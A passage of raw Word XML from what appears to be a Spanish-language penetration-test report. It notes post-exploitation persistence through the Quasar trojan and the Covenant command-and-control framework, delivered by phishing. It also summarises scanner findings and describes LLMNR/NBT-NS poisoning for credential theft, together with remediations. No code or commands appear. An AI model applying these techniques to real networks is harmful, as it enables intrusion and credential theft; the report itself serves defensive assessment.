        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora hablaremos de otra vulnerabilidad encontrada, que es la seguridad de las contraseñas, las contraseñas son un factor muy importante de seguridad, hay que implementar una política de contraseñas de sea fuerte, para así prevenir que los atacantes puedan descifrar esas contraseñas, no se puede permitir que la contraseña de un Administrador de dominio sea ‘abc123’ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298B1A8C" w14:textId="77777777" w:rsidR="00083478" w:rsidRDefault="00083478" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1B038F" w14:textId="501AF81A" w:rsidR="000B05A7" w:rsidRPr="000B05A7" w:rsidRDefault="000B05A7" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B05A7">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Postexplotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA07430" w14:textId="4AD1E312" w:rsidR="00083478" w:rsidRDefault="000B05A7" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Se consigue conseguir persistencia en el sistema de dos maneras una mediante un troyano llamado Quasar y mediante un sistema de Comand and Control llamado Covenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD128E" w14:textId="35A96BD7" w:rsidR="000B05A7" w:rsidRDefault="000B05A7" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Para que Convenant fuera instalado </w:t>
      </w:r>
      <w:r w:rsidR="000A625F">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>en el</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistema se realizó un ataque de phishing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521873FF" w14:textId="77777777" w:rsidR="00DF2F26" w:rsidRDefault="00DF2F26" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29095043" w14:textId="77777777" w:rsidR="00083478" w:rsidRDefault="00083478" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771936A3" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B87C7EA" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40724DFE" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780C61EC" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDCEFCF" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5E1D9D" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3FF6AA" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236B9E6B" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6071A127" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776302D7" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001E96A4" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E8049D" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCB0057" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2A9A27" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A60C0D4" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AFB86DA" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA16F71" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A29A020" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8774F2" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22872F39" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139CCC56" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D394577" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350972E4" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F08E315" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185CE229" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECDD80F" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F17FA8" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F11801" w14:textId="77777777" w:rsidR="000A625F" w:rsidRDefault="000A625F" w:rsidP="00760A0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E23F6D6" w14:textId="66B09409" w:rsidR="00083478" w:rsidRDefault="00083478" w:rsidP="00083478">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc135576004"/>
      <w:r w:rsidRPr="00083478">
        <w:t>Informe técnico:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="75ADD397" w14:textId="77777777" w:rsidR="00083478" w:rsidRPr="000926EC" w:rsidRDefault="00083478" w:rsidP="00083478">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661A30C9" w14:textId="6085CE5C" w:rsidR="00083478" w:rsidRPr="000926EC" w:rsidRDefault="00083478" w:rsidP="00083478">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Procederé a mostrar las vu</w:t>
      </w:r>
      <w:r w:rsidR="00911045" w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>lnerabilidades</w:t>
      </w:r>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontradas tanto en el análisis de vulnerabilidades realizado con Nessus y OpenVas, como en el pentesting realizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B127C6D" w14:textId="77777777" w:rsidR="009127C1" w:rsidRDefault="009127C1" w:rsidP="00083478"/>
    <w:p w14:paraId="1A8F2680" w14:textId="77A2B593" w:rsidR="009127C1" w:rsidRPr="000926EC" w:rsidRDefault="009127C1" w:rsidP="00083478">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000926EC">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Máquinas Windows Server 2019:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC557B" w14:textId="29D89EA2" w:rsidR="00CD3845" w:rsidRPr="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3845">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Crítico:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529827F3" w14:textId="06CDAA71" w:rsidR="00CD3845" w:rsidRPr="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B105FBC" wp14:editId="168E2518">
            <wp:extent cx="6645910" cy="1431925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="202466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6769" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId352">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1431925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32416E12" w14:textId="77777777" w:rsidR="00CD3845" w:rsidRPr="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13286562" w14:textId="77777777" w:rsidR="00CD3845" w:rsidRPr="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3845">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Alto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61695106" w14:textId="034EBB48" w:rsidR="00CD3845" w:rsidRPr="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E737339" wp14:editId="34450F4F">
            <wp:extent cx="6645910" cy="1582420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1907726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26874" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId353">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20563317" w14:textId="77777777" w:rsidR="00CD3845" w:rsidRPr="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F2C004" w14:textId="77777777" w:rsidR="00CD3845" w:rsidRPr="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3845">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Medio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD17F1" w14:textId="77777777" w:rsidR="00CD3845" w:rsidRPr="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4C6520" w14:textId="0ACE32E8" w:rsidR="00CD3845" w:rsidRPr="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23839B64" wp14:editId="23D00FEA">
            <wp:extent cx="6645910" cy="2219960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="63963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2662" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId354">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2219960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D3866" w14:textId="77777777" w:rsidR="003D3AE0" w:rsidRPr="00CD3845" w:rsidRDefault="003D3AE0" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF759ED" w14:textId="7FFBE9BC" w:rsidR="00CD3845" w:rsidRDefault="00CD3845" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3845">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Encontrándonos con muchas vulnerabilidades de flash player, actualizaciones de Windows, que el servidor de certificados usa un cifrado antiguo y poco seguro, Net-Framework</w:t>
      </w:r>
      <w:r w:rsidR="003D3AE0">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, que se solucionarían actualizando el sistema y aplicando los parches de Microsoft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72963651" w14:textId="59BCCCBC" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D3AE0">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerabilidades explotadas en el pentesting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264C3D90" w14:textId="77777777" w:rsidR="00657AE5" w:rsidRPr="003D3AE0" w:rsidRDefault="00657AE5" w:rsidP="00CD3845">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E8E99E" w14:textId="77777777" w:rsidR="003D3AE0" w:rsidRPr="008F170F" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F170F">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Vulnerabilidad: Robo de credenciales de red mediante envenenamiento LLMNR-NBT-NS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585D2CC8" w14:textId="77777777" w:rsidR="00C15B86" w:rsidRDefault="003D3AE0" w:rsidP="00C15B86">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15B86">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E40F845" w14:textId="3DD61129" w:rsidR="00C15B86" w:rsidRPr="00C15B86" w:rsidRDefault="00C15B86" w:rsidP="00C15B86">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15B86">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>El envenenamiento LLMNR (Link-Local Multicast Name Resolution) y NBT-NS (NetBIOS Name Service) son técnicas utilizadas en redes de Windows para resolver nombres de host a direcciones IP. Sin embargo, estas técnicas presentan una vulnerabilidad que puede ser explotada por atacantes malintencionados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8154E4" w14:textId="77777777" w:rsidR="00C15B86" w:rsidRPr="00C15B86" w:rsidRDefault="00C15B86" w:rsidP="00C15B86">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15B86">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>El ataque de envenenamiento LLMNR-NBT-NS aprovecha la respuesta no autenticada de los sistemas que participan en estas resoluciones de nombres. Un atacante puede enviar respuestas falsificadas a las consultas de nombre, engañando a los sistemas en la red para que envíen sus credenciales de autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A2A942" w14:textId="77777777" w:rsidR="00C15B86" w:rsidRPr="00C15B86" w:rsidRDefault="00C15B86" w:rsidP="00C15B86">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15B86">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Al responder antes que los sistemas legítimos, el atacante puede interceptar las solicitudes y respuestas, obteniendo acceso a las credenciales de inicio de sesión en texto plano o en formas débilmente encriptadas. Esto puede incluir nombres de usuario, contraseñas y otros datos confidenciales utilizados para acceder a recursos de red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56F41D" w14:textId="2C4441B0" w:rsidR="003D3AE0" w:rsidRDefault="003D3AE0" w:rsidP="003D3AE0">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD637A5" w14:textId="5EA36E1A" w:rsidR="00175CC7" w:rsidRDefault="003D3AE0" w:rsidP="0056442C">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6426">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFF9DBF" w14:textId="77777777" w:rsidR="00C15B86" w:rsidRPr="00C15B86" w:rsidRDefault="00C15B86" w:rsidP="00C15B86">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15B86">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Deshabilitar LLMNR y NBT-NS: Se recomienda deshabilitar el protocolo LLMNR y NBT-NS en los sistemas y dispositivos de la red. Esto evita que los atacantes exploten esta vulnerabilidad y reducirá el riesgo de robo de credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455354BF" w14:textId="77777777" w:rsidR="00C15B86" w:rsidRPr="00C15B86" w:rsidRDefault="00C15B86" w:rsidP="00C15B86">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15B86">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Uso de DNS seguro: Se debe implementar el uso de DNS seguro (DNS over HTTPS o DNS over TLS) en la red. Esto proporciona una capa adicional de seguridad para las resoluciones de nombres y evita ataques de envenenamiento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E6EB3F" w14:textId="77777777" w:rsidR="00C15B86" w:rsidRPr="00C15B86" w:rsidRDefault="00C15B86" w:rsidP="00C15B86">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15B86">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Conciencia de seguridad y capacitación: Es fundamental educar a los usuarios y administradores de la red sobre los riesgos del envenenamiento LLMNR-NBT-NS y la importancia de proteger las credenciales de autenticación. La capacitación en seguridad y la concienciación sobre las mejores prácticas de autenticación pueden ayudar a prevenir el robo de credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB8AC8" w14:textId="29502ADE" w:rsidR="00C15B86" w:rsidRPr="00C15B86" w:rsidRDefault="00C15B86" w:rsidP="00C15B86">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C15B86">
        <w:rPr>
          <w:sz w:val="18"/>
